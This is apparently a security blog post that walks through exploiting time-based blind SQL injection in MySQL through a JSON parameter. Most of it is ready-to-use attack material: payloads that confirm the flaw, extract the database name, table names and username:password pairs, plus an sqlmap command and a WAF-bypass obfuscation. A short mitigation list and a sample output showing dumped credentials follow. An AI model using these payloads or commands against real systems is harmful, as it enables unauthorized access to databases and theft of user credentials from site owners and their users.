Time-Based Blind SQL Injection (MySQL) Exploitation Guide

Listen to this Post

Featured Image
Discovered a Time-Based Blind SQL Injection vulnerability in the `filters` parameter within a D JSON payload. This type of SQLi relies on delays in database responses to infer data, making it stealthier than traditional error-based SQLi.

You Should Know: Exploiting Time-Based Blind SQLi (MySQL)

1. Confirm SQL Injection with Time Delay

Use a payload that triggers a delay if the injection is successful:

' OR IF(1=1,SLEEP(5),0)-- -

If the server takes 5 seconds to respond, SQLi is confirmed.

2. Extract Database Information

Extract the database name using a conditional delay:

' OR IF(SUBSTRING(DATABASE(),1,1)='a',SLEEP(5),0)-- -

Brute-force each character by adjusting the index (1,11,2, etc.).

3. Retrieve Table Names

Check for table names with:

' OR IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1,1),1,1)='a',SLEEP(5),0)-- -

4. Extract Column Data

Dump sensitive data (e.g., usernames and passwords) via:

' OR IF(SUBSTRING((SELECT CONCAT(username,':',password) FROM users LIMIT 1,1),1,1)='a',SLEEP(5),0)-- -

5. Automate with SQLmap

Use SQLmap for faster exploitation:

sqlmap -u "http://target.com/api" --data='{"filters":""}' --delay=5 --time-sec=5 --technique=T --dbs

– `–technique=T` → Time-based
– `–dbs` → Extract databases

6. Bypass WAF/Filtering

Obfuscate payloads with:

'//OR//IF(1=1,SLEEP(5),0)-- -

7. Mitigation Steps

  • Use Prepared Statements (Parameterized Queries).
  • Implement WAF Rules blocking time-delay patterns.
  • Restrict Database Permissions.

What Undercode Say

Time-Based Blind SQLi is dangerous because it evades traditional detection. Always:
– Test endpoints with time delays.
– Use SQLmap’s time-based (--technique=T) checks.
– Monitor unusual server response times.

Expected Output:

[/bash]

[+] Confirmed Time-Based SQLi: 5-second delay detected.

[+] Extracted DB Name: ‘app_db’

[+] Dumped Credentials: admin:5f4dcc3b5aa765d61d8327deb882cf99

[bash]

Prediction
As APIs grow, JSON-based SQLi will rise. Expect more WAF bypasses via obfuscation.

Relevant URL: SQLmap Cheat Sheet

IT/Security Reporter URL:

Reported By: Deepak Saini – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram